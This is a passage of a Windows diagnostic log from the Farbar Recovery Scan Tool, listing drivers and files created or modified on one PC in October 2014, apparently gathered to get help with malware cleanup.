C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation) R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation) R3 VCSVADHWSer; C:\Windows\System32\DRIVERS\vcsvad.sys [21504 2008-12-26] (Avnex) ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-10-26 16:55 - 2014-10-26 16:56 - 00050203 _____ () C:\Users\Office\Desktop\Addition.txt 2014-10-26 16:53 - 2014-10-26 16:57 - 00036720 _____ () C:\Users\Office\Desktop\FRST.txt 2014-10-26 16:53 - 2014-10-26 16:57 - 00000000 ____D () C:\FRST 2014-10-26 16:52 - 2014-10-26 16:52 - 02113024 _____ (Farbar) C:\Users\Office\Desktop\frst64.exe 2014-10-26 12:39 - 2014-10-26 12:39 - 00002254 _____ () C:\Users\Public\Desktop\@TV Setup Wizard.lnk 2014-10-26 12:39 - 2014-10-26 12:39 - 00002217 _____ () C:\Users\Public\Desktop\@TV PC Player.lnk 2014-10-26 12:39 - 2014-10-26 12:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Belkin 2014-10-26 12:36 - 2014-10-26 12:36 - 89390800 _____ () C:\Users\Office\Downloads\@TV_V1.8.3.206 (2).exe 2014-10-24 10:31 - 2014-10-24 10:31 - 00000000 _____ () C:\Users\Office\AppData\Local\{AE1D889B-686A-4E92-BA3D-D5FA40A4D73C} 2014-10-21 21:18 - 2014-10-21 21:43 - 00000000 ____D () C:\Microlife 2014-10-21 21:18 - 2014-10-21 21:18 - 00000830 _____ () C:\Users\Public\Desktop\Microlife BPA 3.2.5A.lnk 2014-10-21 21:18 - 2014-10-21 21:18 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microlife BPA 3.2.5A 2014-10-19 22:14 - 2014-10-19 22:14 - 00000000 ____D () C:\windows\System32\Tasks\Norton Security Suite 2014-10-19 19:22 - 2014-10-19 20:48 - 00000000 ____D () C:\Navteq 2014-10-19 19:21 - 2014-10-19 20:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Navteq Maps 2014-10-19 19:21 - 2014-10-19 19:22 - 00000000 ____D () C:\Users\Office\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Navteq Maps 2014-10-15 01:15 - 2014-10-09 19:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll 2014-10-15 01:15 - 2014-10-09 19:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll 2014-10-15 01:15 - 2014-10-09 19:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll 2014-10-15 01:15 - 2014-10-06 19:54 - 00378552 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll 2014-10-15 01:15 - 2014-10-06 19:04 - 00331448 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll 2014-10-15 01:15 - 2014-09-28 17:58 - 03198976 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys 2014-10-15 01:15 - 2014-09-25 15:50 - 13619200 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll 2014-10-15 01:15 - 2014-09-25 15:46 - 00365056 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll 2014-10-15 01:15 - 2014-09-25 15:46 - 00243200 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll 2014-10-15 01:15 - 2014-09-25 15:46 - 00069632 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll 2014-10-15 01:15 - 2014-09-25 15:43 - 11807232 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll 2014-10-15 01:15 - 2014-09-25 15:32 - 02017280 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl 2014-10-15 01:15 - 2014-09-25 15:31 - 02108416 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl 2014-10-15 01:15 - 2014-09-18 19:25 - 23631360 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll 2014-10-15 01:15 - 2014-09-18 18:56 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb 2014-10-15 01:15 - 2014-09-18 18:55 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll 2014-10-15 01:15 - 2014-09-18 18:44 - 17484800 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll 2014-10-15 01:15 - 2014-09-18 18:41 - 02796032 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll 2014-10-15 01:15 - 2014-09-18 18:40 - 00547328 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll 2014-10-15 01:15 - 2014-09-18 18:40 - 00066048 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll 2014-10-15 01:15 - 2014-09-18 18:39 - 00048640 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll 2014-10-15 01:15 - 2014-09-18 18:38 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll 2014-10-15 01:15 - 2014-09-18 18:36 - 05829632 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll 2014-10-15 01:15 - 2014-09-18 18:31 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll 2014-10-15 01:15 - 2014-09-18 18:30 - 00033792 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll 2014-10-15 01:15 - 2014-09-18 18:27 - 00595968 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll 2014-10-15 01:15 - 2014-09-18 18:26 - 00139264 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe 2014-10-15 01:15 - 2014-09-18 18:25 - 04201472 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll 2014-10-15 01:15 - 2014-09-18 18:25 - 00758272 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll 2014-10-15 01:15 - 2014-09-18 18:25 - 00111616 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe 2014-10-15 01:15 - 2014-09-18 18:18 - 00940032 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe 2014-10-15 01:15 - 2014-09-18 18:14 - 02724864 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb 2014-10-15 01:15 - 2014-09-18 18:14 - 00446464 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll 2014-10-15 01:15 - 2014-09-18 18:06 - 00072704 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll 2014-10-15 01:15 - 2014-09-18 18:02 - 00454656 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll 2014-10-15 01:15 - 2014-09-18 18:01 - 00195584 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll 2014-10-15 01:15 - 2014-09-18 18:01 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll 2014-10-15 01:15 - 2014-09-18 18:01 - 00051200 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieetwproxystub.dll 2014-10-15 01:15 - 2014-09-18 18:00 - 00085504 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll 2014-10-15 01:15 - 2014-09-18 17:59 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\MshtmlDac.dll 2014-10-15 01:15 - 2014-09-18 17:58 - 00289280 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll 2014-10-15 01:15 - 2014-09-18 17:55 - 02187264 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll 2014-10-15 01:15 - 2014-09-18 17:54 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll 2014-10-15 01:15 - 2014-09-18 17:53 - 00032768 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll 2014-10-15 01:15 - 2014-09-18 17:51 - 00440320 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll 2014-10-15 01:15 - 2014-09-18 17:50 - 00112128 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieUnatt.exe 2014-10-15 01:15 - 2014-09-18 17:49 - 00597504 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9diag.dll 2014-10-15 01:15 - 2014-09-18 17:42 - 00731136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll 2014-10-15 01:15 - 2014-09-18 17:42 - 00710656 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe 2014-10-15 01:15 - 2014-09-18 17:40 - 01249280 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll 2014-10-15 01:15 - 2014-09-18 17:36 - 00060416 _____ (Microsoft Corporation) C:\windows\SysWOW64\JavaScriptCollectionAgent.dll 2014-10-15 01:15 - 2014-09-18 17:33 - 02309632 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll 2014-10-15 01:15 - 2014-09-18 17:32 - 00164864 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll 2014-10-15 01:15 - 2014-09-18 17:20 - 00607744 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll 2014-10-15 01:15 - 2014-09-18 17:18 - 01068032 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmlmedia.dll 2014-10-15 01:15 - 2014-09-18 17:14 - 01447936 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll 2014-10-15 01:15 - 2014-09-18 16:59 - 01810944 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll 2014-10-15 01:15 - 2014-09-18 16:59 - 00775168 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll 2014-10-15 01:15 - 2014-09-18 16:53 - 01190400 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll 2014-10-15 01:15 - 2014-09-18 16:52 - 00678400 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieapfltr.dll 2014-10-15 01:15 - 2014-08-18 20:11 - 00693176 _____ (Microsoft Corporation) C:\windows\system32\winload.efi 2014-10-15 01:15 - 2014-08-18 20:10 - 00616352 _____ (Microsoft Corporation) C:\windows\system32\winresume.efi 2014-10-15 01:15 - 2014-08-18 20:08 - 00503808 _____ (Microsoft Corporation) C:\windows\system32\srcore.dll 2014-10-15 01:15 - 2014-08-18 20:08 - 00063488 _____ (Microsoft Corporation) C:\windows\system32\setbcdlocale.dll 2014-10-15 01:15 - 2014-08-18 20:08 - 00050176 _____ (Microsoft Corporation) C:\windows\system32\srclient.dll 2014-10-15 01:15 - 2014-08-18 20:07 - 00296960 _____ (Microsoft Corporation) C:\windows\system32\rstrui.exe 2014-10-15 01:15 - 2014-08-18 20:07 - 00146944 _____ (Microsoft Corporation) C:\windows\system32\appidpolicyconverter.exe 2014-10-15 01:15 - 2014-08-18 20:07 - 00058880 _____ (Microsoft Corporation) C:\windows\system32\appidapi.dll 2014-10-15 01:15 - 2014-08-18 20:07 - 00032256 _____ (Microsoft Corporation) C:\windows\system32\appidsvc.dll 2014-10-15 01:15 - 2014-08-18 20:07 - 00017920 _____ (Microsoft Corporation) C:\windows\system32\appidcertstorecheck.exe 2014-10-15 01:15 - 2014-08-18 19:41 - 00050688 _____ (Microsoft Corporation) C:\windows\SysWOW64\appidapi.dll 2014-10-15 01:15 - 2014-08-18 19:41 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\srclient.dll 2014-10-15 01:15 - 2014-08-18 19:06 - 00061440 _____ (Microsoft Corporation) C:\windows\system32\Drivers\appid.sys 2014-10-15 01:15 - 2014-07-06 19:07 - 14632960 _____ (Microsoft Corporation) C:\windows\system32\wmp.dll 2014-10-15 01:15 - 2014-07-06 19:07 - 00782848 _____ (Microsoft Corporation) C:\windows\system32\wmdrmsdk.dll 2014-10-15 01:15 - 2014-07-06 19:07 - 00229376 _____ (Microsoft Corporation) C:\windows\system32\wintrust.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 05551032 _____ (Microsoft Corporation) C:\windows\system32\ntoskrnl.exe 2014-10-15 01:15 - 2014-07-06 19:06 - 04120576 _____ (Microsoft Corporation) C:\windows\system32\mf.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 01574400 _____ (Microsoft Corporation) C:\windows\system32\quartz.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 01480192 _____ (Microsoft Corporation) C:\windows\system32\crypt32.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 01202176 _____ (Microsoft Corporation) C:\windows\system32\drmv2clt.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 01069056 _____ (Microsoft Corporation) C:\windows\system32\cryptui.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00842240 _____ (Microsoft Corporation) C:\windows\system32\blackbox.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00679424 _____ (Microsoft Corporation) C:\windows\system32\audiosrv.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00641024 _____ (Microsoft Corporation) C:\windows\system32\msscp.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00631808 _____ (Microsoft Corporation) C:\windows\system32\evr.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00500224 _____ (Microsoft Corporation) C:\windows\system32\AUDIOKSE.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00497664 _____ (Microsoft Corporation) C:\windows\system32\drmmgrtn.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00440832 _____ (Microsoft Corporation) C:\windows\system32\AudioEng.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00432128 _____ (Microsoft Corporation) C:\windows\system32\mfplat.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00325632 _____ (Microsoft Corporation) C:\windows\system32\msnetobj.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00296448 _____ (Microsoft Corporation) C:\windows\system32\AudioSes.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00284672 _____ (Microsoft Corporation) C:\windows\system32\EncDump.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00206848 _____ (Microsoft Corporation) C:\windows\system32\mfps.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00188416 _____ (Microsoft Corporation) C:\windows\system32\pcasvc.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00187904 _____ (Microsoft Corporation) C:\windows\system32\cryptsvc.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00082432 _____ (Microsoft Corporation) C:\windows\system32\cryptsp.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00055808 _____ (Microsoft Corporation) C:\windows\system32\rrinstaller.exe 2014-10-15 01:15 - 2014-07-06 19:06 - 00024576 _____ (Microsoft Corporation) C:\windows\system32\mfpmp.exe 2014-10-15 01:15 - 2014-07-06 19:06 - 00009728 _____ (Microsoft Corporation) C:\windows\system32\spwmp.dll 2014-10-15 01:15 - 2014-07-06 19:06 - 00005120 _____ (Microsoft Corporation) C:\windows\system32\msdxm.ocx 2014-10-15 01:15 - 2014-07-06 19:06 - 00005120 _____ (Microsoft Corporation) C:\windows\system32\dxmasf.dll 2014-10-15 01:15 - 2014-07-06 19:05 - 12625920 _____ (Microsoft Corporation) C:\windows\system32\wmploc.DLL 2014-10-15 01:15 - 2014-07-06 19:05 - 00126464 _____ (Microsoft Corporation) C:\windows\system32\audiodg.exe 2014-10-15 01:15 - 2014-07-06 19:02 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\mferror.dll 2014-10-15 01:15 - 2014-07-06 18:52 - 00663552 _____ (Microsoft Corporation) C:\windows\system32\Drivers\PEAuth.sys 2014-10-15 01:15 - 2014-07-06 18:40 - 11411456 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmp.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 03208704 _____ (Microsoft Corporation) C:\windows\SysWOW64\mf.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 01329664 _____ (Microsoft Corporation) C:\windows\SysWOW64\quartz.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 01174528 _____ (Microsoft Corporation) C:\windows\SysWOW64\crypt32.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 01005056 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptui.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00988160 _____ (Microsoft Corporation) C:\windows\SysWOW64\drmv2clt.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00744960 _____ (Microsoft Corporation) C:\windows\SysWOW64\blackbox.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00617984 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmdrmsdk.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00504320 _____ (Microsoft Corporation) C:\windows\SysWOW64\msscp.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00489984 _____ (Microsoft Corporation) C:\windows\SysWOW64\evr.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00442880 _____ (Microsoft Corporation) C:\windows\SysWOW64\AUDIOKSE.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00406016 _____ (Microsoft Corporation) C:\windows\SysWOW64\drmmgrtn.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00374784 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioEng.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00354816 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfplat.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00265216 _____ (Microsoft Corporation) C:\windows\SysWOW64\msnetobj.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00195584 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioSes.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00179200 _____ (Microsoft Corporation) C:\windows\SysWOW64\wintrust.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00143872 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptsvc.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00103424 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfps.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00081408 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptsp.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00008192 _____ (Microsoft Corporation) C:\windows\SysWOW64\spwmp.dll 2014-10-15 01:15 - 2014-07-06 18:40 - 00004096 _____ (Microsoft Corporation) C:\windows\SysWOW64\msdxm.ocx 2014-10-15 01:15 - 2014-07-06 18:40 - 00004096 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxmasf.dll 2014-10-15 01:15 - 2014-07-06 18:39 - 12625408 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmploc.DLL 2014-10-15 01:15 - 2014-07-06 18:39 - 03970488 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntkrnlpa.exe 2014-10-15 01:15 - 2014-07-06 18:39 - 03914680 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntoskrnl.exe 2014-10-15 01:15 - 2014-07-06 18:39 - 00050176 _____ (Microsoft Corporation) C:\windows\SysWOW64\rrinstaller.exe 2014-10-15 01:15 - 2014-07-06 18:39 - 00023040 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfpmp.exe 2014-10-15 01:15 - 2014-07-06 18:37 - 00002048 _____ (Microsoft Corporation) C:\windows\SysWOW64\mferror.dll 2014-10-15 01:15 - 2014-06-27 17:21 - 00619056 _____ (Microsoft Corporation) C:\windows\system32\winload.exe 2014-10-15 01:15 - 2014-06-27 17:21 - 00532176 _____ (Microsoft Corporation) C:\windows\system32\winresume.exe 2014-10-15 01:15 - 2014-06-27 17:21 - 00457400 _____ (Microsoft Corporation) C:\windows\system32\ci.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll 2014-10-15 01:15 - 2014-06-18 15:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll 2014-10-15 01:14 - 2014-09-17 19:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll 2014-10-15 01:14 - 2014-09-17 18:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll 2014-10-15 01:14 - 2014-09-12 18:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll 2014-10-15 01:14 - 2014-09-12 18:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll 2014-10-15 01:14 - 2014-09-03 22:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll 2014-10-15 01:14 - 2014-09-03 22:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 03722240 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 01118720 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe 2014-10-15 01:14 - 2014-07-16 19:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe 2014-10-15 01:14 - 2014-07-16 19:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll 2014-10-15 01:14 - 2014-07-16 19:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll 2014-10-15 01:14 - 2014-07-16 18:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll 2014-10-15 01:14 - 2014-07-16 18:39 - 03221504 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll 2014-10-15 01:14 - 2014-07-16 18:39 - 01051136 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe 2014-10-15 01:14 - 2014-07-16 18:39 - 00131584 _____ (Microsoft Corporation) C:\windows\SysWOW64\aaclient.dll 2014-10-15 01:14 - 2014-07-16 18:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll 2014-10-15 01:14 - 2014-07-16 18:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll 2014-10-15 01:14 - 2014-07-16 18:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys 2014-10-15 01:14 - 2014-07-16 18:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys 2014-10-13 11:06 - 2014-10-13 11:07 - 00000000 ____D () C:\Users\Office\AppData\Local\{8DFEEE06-483F-466C-A817-40BBB7258E1E} 2014-10-12 23:06 - 2014-10-12 23:06 - 00000000 ____D () C:\Users\Office\AppData\Local\{21005D8E-B41E-4BB6-B38F-C97B1B42F46D} 2014-10-12 11:05 - 2014-10-12 11:05 - 00000000 ____D () C:\Users\Office\AppData\Local\{448B3B98-C5E2-4A60-9DD4-C420497B4AC0} 2014-10-11 23:04 - 2014-10-11 23:05 - 00000000 ____D () C:\Users\Office\AppData\Local\{E86237C9-8745-4329-8B2B-2FF1AF029720} 2014-10-11 11:04 - 2014-10-11 11:04 - 00000000 ____D () C:\Users\Office\AppData\Local\{811294BF-21A5-457B-A6CE-C429C8F96B5B} 2014-10-10 23:04 - 2014-10-10 23:04 - 00000000 ____D () C:\Users\Office\AppData\Local\{FC5068DC-59E2-4A01-A1FC-DDCFB4832DCD} 2014-10-08 21:33 - 2014-10-08 21:33 - 00000000 ____D () C:\Users\Office\AppData\Local\{84319DC6-9932-46E2-BD18-647922F96978} 2014-10-08 15:25 - 2014-10-08 15:25 - 00068189 ____N () C:\Users\Office\Desktop\Through Aug 2014.xlsx 2014-10-06 21:25 - 2014-10-06 21:25 - 00000000 ____D () C:\Users\Office\AppData\Local\{E87F91F0-81EC-41AD-B4F2-08328B833D5B} 2014-10-02 21:36 - 2014-10-02 21:48 - 00000000 ____D () C:\Program Files (x86)\JustCloud 2014-10-02 21:36 - 2014-10-02 21:36 - 00001122 _____ () C:\Users\Office\Desktop\JustCloud.lnk 2014-10-02 21:36 - 2014-10-02 21:36 - 00000000 ____D () C:\Users\Office\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JustCloud 2014-09-30 10:23 - 2014-09-24 19:08 - 00371712 _____ (Microsoft Corporation) C:\windows\system32\qdvd.dll 2014-09-30 10:23 - 2014-09-24 18:40 - 00519680 _____ (Microsoft Corporation) C:\windows\SysWOW64\qdvd.dll 2014-09-27 20:10 - 2014-09-28 08:10 - 00000000 ____D () C:\Users\Office\AppData\Local\{C02CAFEA-9471-4665-8673-C33F09A8F129} ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-10-26 16:43 - 2013-07-12 15:43 - 00000290 _____ () C:\windows\Tasks\DSite.job 2014-10-26 16:42 - 2014-02-24 19:25 - 00000568 _____ () C:\windows\Tasks\G2MUpdateTask-S-1-5-21-3549027879-2872290269-2961675323-1000.job 2014-10-26 16:35 - 2012-08-30 12:24 - 00000000 ____D () C:\Users\Office\AppData\Local\CrashDumps 2014-10-26 16:16 - 2012-08-10 20:59 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job 2014-10-26 16:05 - 2012-09-12 12:58 - 00000000 ___RD () C:\Users\Office\Virtual Machines 2014-10-26 14:17 - 2014-06-21 20:50 - 00129752 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys 2014-10-26 13:27 - 2014-06-21 20:49 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-10-26 13:27 - 2012-08-21 16:11 - 00000000 ____D () C:\Program Files (x86)\Constant Guard Protection Suite 2014-10-26 13:12 - 2012-08-25 13:06 - 00003192 _____ () C:\windows\System32\Tasks\HPCeeScheduleForOffice 2014-10-26 13:12 - 2012-08-25 13:06 - 00000336 _____ () C:\windows\Tasks\HPCeeScheduleForOffice.job 2014-10-26 12:54 - 2012-08-21 22:25 - 00000000 ____D () C:\Users\Office\Documents\Outlook Files 2014-10-26 12:51 - 2013-08-30 20:36 - 04091595 _____ () C:\Users\Office\AppData\Local\Tempchannel_logos.zip 2014-10-26 12:49 - 2012-08-17 17:35 - 01641515 _____ () C:\windows\WindowsUpdate.log 2014-10-26 12:40 - 2013-08-30 20:10 - 00000000 ____D () C:\Users\Office\AppData\Local\IR 2014-10-26 12:39 - 2013-08-30 20:09 - 00000000 ____D () C:\Program Files (x86)\Belkin 2014-10-26 12:39 - 2012-08-10 20:51 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information 2014-10-26 12:39 - 2009-07-13 21:51 - 00078507 _____ () C:\windows\setupact.log 2014-10-26 12:29 - 2013-07-14 11:52 - 00000000 ____D () C:\Program Files (x86)\NCH Software 2014-10-26 12:29 - 2012-08-17 16:43 - 00003934 _____ () C:\windows\System32\Tasks\User_Feed_Synchronization-{4F6E0B12-ADF8-4394-87C7-78D6CE8AE75E} 2014-10-26 12:28 - 2012-12-09 15:45 - 00000000 ____D () C:\Users\Office\AppData\Local\TomTom 2014-10-26 12:18 - 2014-07-05 15:24 - 00000000 ____D () C:\Users\Office\AppData\Roaming\Firetrust 2014-10-26 11:58 - 2009-07-13 21:45 - 00027568 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-10-26 11:58 - 2009-07-13 21:45 - 00027568 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-10-26 11:57 - 2012-08-21 16:12 - 00000000 ____D () C:\Users\Office\AppData\Roaming\ID Vault 2014-10-26 11:54 - 2009-07-13 22:13 - 00801082 _____ () C:\windows\system32\PerfStringBackup.INI 2014-10-26 11:50 - 2013-04-30 18:19 - 00000000 ___RD () C:\Users\Office\Dropbox 2014-10-26 11:50 - 2013-04-30 18:17 - 00000000 ____D () C:\Users\Office\AppData\Roaming\Dropbox 2014-10-26 11:48 - 2014-01-23 17:54 - 00001006 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Client.lnk 2014-10-26 11:48 - 2014-01-23 17:54 - 00000990 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk 2014-10-26 11:48 - 2012-08-10 21:05 - 00000000 ____D () C:\ProgramData\PDFC 2014-10-26 11:47 - 2009-07-13 22:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT 2014-10-26 11:45 - 2012-08-21 08:20 - 00000000 ____D () C:\ProgramData\LogMeIn 2014-10-25 19:32 - 2013-07-14 12:20 - 00000000 ____D () C:\windows\Minidump 2014-10-25 19:31 - 2012-08-10 21:54 - 00304227 ____N () 